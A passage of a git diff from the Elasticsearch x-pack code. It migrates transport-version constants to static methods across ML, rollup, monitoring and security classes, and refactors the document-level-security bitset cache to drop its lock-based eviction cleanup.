-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java
index deeed6df87064..339680348a28e 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java
@@ -8,7 +8,6 @@
 import org.elasticsearch.ElasticsearchParseException;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.action.ActionRequestValidationException;
 import org.elasticsearch.action.ActionType;
 import org.elasticsearch.action.ValidateActions;
@@ -279,7 +278,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java
index b8ac1b2f2cfdd..f3bada2a9f0e7 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.ml.inference;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.cluster.ClusterState;
 import org.elasticsearch.cluster.Diff;
 import org.elasticsearch.cluster.DiffableUtils;
@@ -113,7 +112,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
@@ -163,7 +162,7 @@ public void writeTo(StreamOutput out) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java
index b04b49e645bcb..8fb9f62652a63 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ml.inference.trainedmodel;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xcontent.ObjectParser;
@@ -226,7 +225,7 @@ public MlConfigVersion getMinimalSupportedMlConfigVersion() {
     @Override
     public TransportVersion getMinimalSupportedTransportVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public static Builder builder() {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java
index 9ee97029541f1..6f7888e220a3f 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ml.inference.trainedmodel;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xcontent.ObjectParser;
@@ -210,7 +209,7 @@ public boolean isSupported(InferenceConfig inferenceConfig) {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public static class Builder implements InferenceConfigUpdate.Builder {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java
index c6d70543d89ed..25a8ee939c49e 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.ml.inference.trainedmodel;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xpack.core.ml.MlConfigVersion;
@@ -71,7 +70,7 @@ public int hashCode() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public static class Builder implements InferenceConfigUpdate.Builder {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java
index 13c63b9cc7ba0..cfff8bb216002 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ml.inference.trainedmodel;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xcontent.ObjectParser;
@@ -159,7 +158,7 @@ public MlConfigVersion getMinimalSupportedMlConfigVersion() {
     @Override
     public TransportVersion getMinimalSupportedTransportVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public static Builder builder() {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java
index c7b66ef95943e..929c475345b0c 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ml.inference.trainedmodel;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xcontent.ObjectParser;
@@ -114,7 +113,7 @@ public String getName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java
index fdd8735bb2454..d66667c775bbf 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.ml.inference.trainedmodel;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
@@ -55,7 +54,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java
index 749bf786ad44b..f1988b4dbd275 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java
@@ -8,7 +8,6 @@
 import org.apache.lucene.util.Accountable;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.NamedWriteable;
 import org.elasticsearch.xpack.core.ml.utils.NamedXContentObject;
@@ -34,6 +33,6 @@ public interface TrainedModel extends NamedXContentObject, NamedWriteable, Accou
     long estimatedNumOperations();
     default TransportVersion getMinimalCompatibilityVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java
index 94d0431ff470d..3df10585aee10 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java
@@ -10,7 +10,6 @@
 import org.apache.lucene.util.Accountables;
 import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.core.Nullable;
@@ -286,7 +285,7 @@ public TransportVersion getMinimalCompatibilityVersion() {
         return models.stream()
             .map(TrainedModel::getMinimalCompatibilityVersion)
             .max(TransportVersion::compareTo)
-            .orElse(TransportVersions.ZERO);
+            .orElse(TransportVersion.zero());
     }
     public static class Builder {
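The Ensemble hunk above computes the composite model's minimal compatibility version as the maximum over its member models, falling back to TransportVersion.zero() for an empty list: a composite can only be deserialized on a node that satisfies its strictest component. The same one-liner in miniature, with plain ints and a hypothetical Component record standing in for TransportVersion and TrainedModel:

```java
import java.util.List;

// Hypothetical stand-in: each component declares its own minimal version.
record Component(String name, int minimalVersion) {}

final class Versions {
    // An aggregate is only wire-compatible where all members are, so its
    // minimal version is the maximum of the members' minimal versions.
    static int minimalVersionFor(List<Component> components) {
        return components.stream()
            .mapToInt(Component::minimalVersion)
            .max()
            .orElse(0); // empty aggregate: compatible everywhere, like TransportVersion.zero()
    }

    public static void main(String[] args) {
        var parts = List.of(new Component("tree", 7), new Component("encoder", 9));
        System.out.println(minimalVersionFor(parts)); // prints 9
    }
}
```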
--git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java index 48c14f79abcbf..6ee2d270b3206 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.monitoring; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -40,7 +39,7 @@ public MonitoringFeatureSetUsage(boolean collectionEnabled, Map @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public Map getExporters() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java index 59d8926a6dcf8..34cdbf4802e95 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java @@ -50,7 +50,7 @@ protected void innerXContent(XContentBuilder builder, Params params) throws IOEx @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java index 3918f96ae2c56..d36960f948952 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.rollup.job; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.SimpleDiffable; import org.elasticsearch.common.io.stream.StreamInput; @@ -120,6 +119,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java index 70a5e0c7a3ce2..4163d529fac70 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.searchablesnapshots; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ToXContent; @@ -34,7 +33,7 @@ public 
SearchableSnapshotFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java index 52ccc3c91985c..19f8c6d31f1dd 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java @@ -112,7 +112,7 @@ public SecurityFeatureSetUsage( @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java index 54668c9dd2df7..b744d6b64f1b6 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.security.authc; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -94,7 +93,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java index 1177ff68c34c4..5c969b3545f03 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java @@ -31,26 +31,21 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.concurrent.ConcurrentCollections; -import org.elasticsearch.common.util.concurrent.ReleasableLock; import org.elasticsearch.core.Nullable; import org.elasticsearch.core.TimeValue; import org.elasticsearch.lucene.util.BitSets; import org.elasticsearch.lucene.util.MatchAllBitSet; -import org.elasticsearch.threadpool.ThreadPool; import java.io.Closeable; import java.io.IOException; import java.util.List; import java.util.Map; import java.util.Objects; -import java.util.Optional; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ExecutionException; -import java.util.concurrent.ExecutorService; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.ReentrantReadWriteLock; /** * This is a cache for {@link BitSet} instances that are used with the {@link DocumentSubsetReader}. 
@@ -81,6 +76,8 @@ */ public final class DocumentSubsetBitsetCache implements IndexReader.ClosedListener, Closeable, Accountable { + private static final Logger logger = LogManager.getLogger(DocumentSubsetBitsetCache.class); + /** * The TTL defaults to 2 hours. We default to a large cache size ({@link #CACHE_SIZE_SETTING}), and aggressively * expire unused entries so that the cache does not hold on to memory unnecessarily. @@ -102,40 +99,15 @@ public final class DocumentSubsetBitsetCache implements IndexReader.ClosedListen private static final BitSet NULL_MARKER = new FixedBitSet(0); - private static final Logger logger = LogManager.getLogger(DocumentSubsetBitsetCache.class); - - /** - * When a {@link BitSet} is evicted from {@link #bitsetCache}, we need to also remove it from {@link #keysByIndex}. - * We use a {@link ReentrantReadWriteLock} to control atomicity here - the "read" side represents potential insertions to the - * {@link #bitsetCache}, the "write" side represents removals from {@link #keysByIndex}. - * The risk (that {@link Cache} does not provide protection for) is that an entry is removed from the cache, and then immediately - * re-populated, before we process the removal event. To protect against that we need to check the state of the {@link #bitsetCache} - * but we need exclusive ("write") access while performing that check and updating the values in {@link #keysByIndex}. - */ - private final ReleasableLock cacheEvictionLock; - private final ReleasableLock cacheModificationLock; - private final ExecutorService cleanupExecutor; - private final long maxWeightBytes; private final Cache bitsetCache; private final Map> keysByIndex; private final AtomicLong cacheFullWarningTime; - public DocumentSubsetBitsetCache(Settings settings, ThreadPool threadPool) { - this(settings, threadPool.executor(ThreadPool.Names.GENERIC)); - } - /** * @param settings The global settings object for this node - * @param cleanupExecutor An executor on which the cache cleanup tasks can be run. Due to the way the cache is structured internally, - * it is sometimes necessary to run an asynchronous task to synchronize the internal state. */ - protected DocumentSubsetBitsetCache(Settings settings, ExecutorService cleanupExecutor) { - final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - this.cacheEvictionLock = new ReleasableLock(readWriteLock.writeLock()); - this.cacheModificationLock = new ReleasableLock(readWriteLock.readLock()); - this.cleanupExecutor = cleanupExecutor; - + public DocumentSubsetBitsetCache(Settings settings) { final TimeValue ttl = CACHE_TTL_SETTING.get(settings); this.maxWeightBytes = CACHE_SIZE_SETTING.get(settings).getBytes(); this.bitsetCache = CacheBuilder.builder() @@ -150,8 +122,8 @@ protected DocumentSubsetBitsetCache(Settings settings, ExecutorService cleanupEx } @Override - public void onClose(IndexReader.CacheKey ownerCoreCacheKey) { - final Set keys = keysByIndex.remove(ownerCoreCacheKey); + public void onClose(IndexReader.CacheKey indexKey) { + final Set keys = keysByIndex.remove(indexKey); if (keys != null) { // Because this Set has been removed from the map, and the only update to the set is performed in a // Map#compute call, it should not be possible to get a concurrent modification here. 
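The next hunk replaces that executor-and-lock cleanup with a direct, lock-free tidy-up in the eviction listener. A minimal sketch of the pattern it relies on, with hypothetical names: ConcurrentHashMap.computeIfPresent runs its remapping function atomically per entry, so the per-segment key set can be pruned, and dropped entirely once empty, without a read/write lock:

import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

final class EvictionTidySketch {
    private final Map<String, Set<String>> keysByIndex = new ConcurrentHashMap<>();

    void onCacheEviction(String segmentKey, String evictedCacheKey) {
        // computeIfPresent runs the remapping function atomically for this map entry, so no
        // explicit lock is needed; returning null removes the now-empty set from the map
        keysByIndex.computeIfPresent(segmentKey, (k, keys) -> {
            keys.remove(evictedCacheKey);
            return keys.isEmpty() ? null : keys;
        });
    }
}

As the new comments in the hunk explain, the trade-off is that a racing re-insertion may be tidied away too eagerly, costing only a missed eager invalidation, never a correctness failure.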
@@ -163,24 +135,17 @@ public void onClose(IndexReader.CacheKey ownerCoreCacheKey) { * Cleanup (synchronize) the internal state when an object is removed from the primary cache */ private void onCacheEviction(RemovalNotification notification) { - final BitsetCacheKey bitsetKey = notification.getKey(); - final IndexReader.CacheKey indexKey = bitsetKey.index; - if (keysByIndex.getOrDefault(indexKey, Set.of()).contains(bitsetKey) == false) { - // If the bitsetKey isn't in the lookup map, then there's nothing to synchronize - return; - } - // We push this to a background thread, so that it reduces the risk of blocking searches, but also so that the lock management is - // simpler - this callback is likely to take place on a thread that is actively adding something to the cache, and is therefore - // holding the read ("update") side of the lock. It is not possible to upgrade a read lock to a write ("eviction") lock, but we - // need to acquire that lock here. - cleanupExecutor.submit(() -> { - try (ReleasableLock ignored = cacheEvictionLock.acquire()) { - // it's possible for the key to be back in the cache if it was immediately repopulated after it was evicted, so check - if (bitsetCache.get(bitsetKey) == null) { - // key is no longer in the cache, make sure it is no longer in the lookup map either. - Optional.ofNullable(keysByIndex.get(indexKey)).ifPresent(set -> set.remove(bitsetKey)); - } - } + final BitsetCacheKey cacheKey = notification.getKey(); + final IndexReader.CacheKey indexKey = cacheKey.indexKey; + // the key is *probably* no longer in the cache, so make sure it is no longer in the lookup map. + // note: rather than locking (which destroys our throughput), we're erring on the side of tidying the keysByIndex + // structure even if some other racing thread has already added a new bitset into the cache for this same key. + // the keysByIndex structure is used in onClose (our notification from lucene that a segment has become inaccessible), + // so we might end up failing to *eagerly* invalidate a bitset -- the consequence of that would be temporarily higher + // memory use (the bitset will not be accessed, and it will still be invalidated eventually for size or ttl reasons). + keysByIndex.computeIfPresent(indexKey, (ignored, keys) -> { + keys.remove(cacheKey); + return keys.isEmpty() ? null : keys; }); } @@ -231,41 +196,39 @@ public BitSet getBitSet(final Query query, final LeafReaderContext context) thro final IndexReader.CacheKey indexKey = coreCacheHelper.getKey(); final BitsetCacheKey cacheKey = new BitsetCacheKey(indexKey, query); - try (ReleasableLock ignored = cacheModificationLock.acquire()) { - final BitSet bitSet = bitsetCache.computeIfAbsent(cacheKey, ignore1 -> { - // This ensures all insertions into the set are guarded by ConcurrentHashMap's atomicity guarantees. - keysByIndex.compute(indexKey, (ignore2, set) -> { - if (set == null) { - set = ConcurrentCollections.newConcurrentSet(); - } - set.add(cacheKey); - return set; - }); - final BitSet result = computeBitSet(query, context); - if (result == null) { - // A cache loader is not allowed to return null, return a marker object instead. 
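As the loader comment above notes, a cache loader may not return null, so a shared sentinel stands in for "no bitset" and is translated back to null on the way out. A minimal sketch of that null-marker technique, with hypothetical names and a plain map in place of the real Cache:

import java.util.Locale;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

final class NullMarkerSketch {
    private static final Object NULL_MARKER = new Object(); // stands in for the zero-length FixedBitSet
    private final Map<String, Object> cache = new ConcurrentHashMap<>();

    Object get(String key) {
        final Object value = cache.computeIfAbsent(key, k -> {
            final Object computed = expensiveCompute(k);
            // the loader must never hand the cache a null, so store a shared sentinel instead
            return computed == null ? NULL_MARKER : computed;
        });
        // translate the sentinel back to null on the way out, as getBitSet does
        return value == NULL_MARKER ? null : value;
    }

    private static Object expensiveCompute(String key) {
        return key.isEmpty() ? null : key.toUpperCase(Locale.ROOT);
    }
}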
- return NULL_MARKER; - } - final long bitSetBytes = result.ramBytesUsed(); - if (bitSetBytes > this.maxWeightBytes) { - logger.warn( - "built a DLS BitSet that uses [{}] bytes; the DLS BitSet cache has a maximum size of [{}] bytes;" - + " this object cannot be cached and will need to be rebuilt for each use;" - + " consider increasing the value of [{}]", - bitSetBytes, - maxWeightBytes, - CACHE_SIZE_SETTING.getKey() - ); - } else if (bitSetBytes + bitsetCache.weight() > maxWeightBytes) { - maybeLogCacheFullWarning(); + final BitSet bitSet = bitsetCache.computeIfAbsent(cacheKey, ignore1 -> { + // This ensures all insertions into the set are guarded by ConcurrentHashMap's atomicity guarantees. + keysByIndex.compute(indexKey, (ignore2, keys) -> { + if (keys == null) { + keys = ConcurrentCollections.newConcurrentSet(); } - return result; + keys.add(cacheKey); + return keys; }); - if (bitSet == NULL_MARKER) { - return null; - } else { - return bitSet; + final BitSet result = computeBitSet(query, context); + if (result == null) { + // A cache loader is not allowed to return null, return a marker object instead. + return NULL_MARKER; } + final long bitSetBytes = result.ramBytesUsed(); + if (bitSetBytes > this.maxWeightBytes) { + logger.warn( + "built a DLS BitSet that uses [{}] bytes; the DLS BitSet cache has a maximum size of [{}] bytes;" + + " this object cannot be cached and will need to be rebuilt for each use;" + + " consider increasing the value of [{}]", + bitSetBytes, + maxWeightBytes, + CACHE_SIZE_SETTING.getKey() + ); + } else if (bitSetBytes + bitsetCache.weight() > maxWeightBytes) { + maybeLogCacheFullWarning(); + } + return result; + }); + if (bitSet == NULL_MARKER) { + return null; + } else { + return bitSet; } } @@ -323,11 +286,11 @@ public Map usageStats() { } private static class BitsetCacheKey { - final IndexReader.CacheKey index; + final IndexReader.CacheKey indexKey; final Query query; - private BitsetCacheKey(IndexReader.CacheKey index, Query query) { - this.index = index; + private BitsetCacheKey(IndexReader.CacheKey indexKey, Query query) { + this.indexKey = indexKey; this.query = query; } @@ -340,41 +303,59 @@ public boolean equals(Object other) { return false; } final BitsetCacheKey that = (BitsetCacheKey) other; - return Objects.equals(this.index, that.index) && Objects.equals(this.query, that.query); + return Objects.equals(this.indexKey, that.indexKey) && Objects.equals(this.query, that.query); } @Override public int hashCode() { - return Objects.hash(index, query); + return Objects.hash(indexKey, query); } @Override public String toString() { - return getClass().getSimpleName() + "(" + index + "," + query + ")"; + return getClass().getSimpleName() + "(" + indexKey + "," + query + ")"; } } /** - * This method verifies that the two internal data structures ({@link #bitsetCache} and {@link #keysByIndex}) are consistent with one - * another. This method is only called by tests. + * This test-only method verifies that the two internal data structures ({@link #bitsetCache} and {@link #keysByIndex}) are consistent + * with one another. 
*/ + // visible for testing void verifyInternalConsistency() { - this.bitsetCache.keys().forEach(bck -> { - final Set set = this.keysByIndex.get(bck.index); - if (set == null) { - throw new IllegalStateException( - "Key [" + bck + "] is in the cache, but there is no entry for [" + bck.index + "] in the lookup map" - ); - } - if (set.contains(bck) == false) { + verifyInternalConsistencyCacheToKeys(); + verifyInternalConsistencyKeysToCache(); + } + + /** + * This test-only method iterates over the {@link #bitsetCache} and checks that {@link #keysByIndex} is consistent with it. + */ + // visible for testing + void verifyInternalConsistencyCacheToKeys() { + bitsetCache.keys().forEach(cacheKey -> { + final Set keys = keysByIndex.get(cacheKey.indexKey); + if (keys == null || keys.contains(cacheKey) == false) { throw new IllegalStateException( - "Key [" + bck + "] is in the cache, but the lookup entry for [" + bck.index + "] does not contain that key" + "Key [" + cacheKey + "] is in the cache, but the lookup entry for [" + cacheKey.indexKey + "] does not contain that key" ); } }); - this.keysByIndex.values().stream().flatMap(Set::stream).forEach(bck -> { - if (this.bitsetCache.get(bck) == null) { - throw new IllegalStateException("Key [" + bck + "] is in the lookup map, but is not in the cache"); + } + + /** + * This test-only method iterates over the {@link #keysByIndex} and checks that {@link #bitsetCache} is consistent with it. + */ + // visible for testing + void verifyInternalConsistencyKeysToCache() { + keysByIndex.forEach((indexKey, keys) -> { + if (keys == null || keys.isEmpty()) { + throw new IllegalStateException("The lookup entry for [" + indexKey + "] is null or empty"); + } else { + keys.forEach(cacheKey -> { + if (bitsetCache.get(cacheKey) == null) { + throw new IllegalStateException("Key [" + cacheKey + "] is in the lookup map, but is not in the cache"); + } + }); } }); } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java index 38b78ad357bf5..2f3469b64b9c2 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java @@ -519,6 +519,40 @@ static RoleDescriptor kibanaSystem(String name) { ) 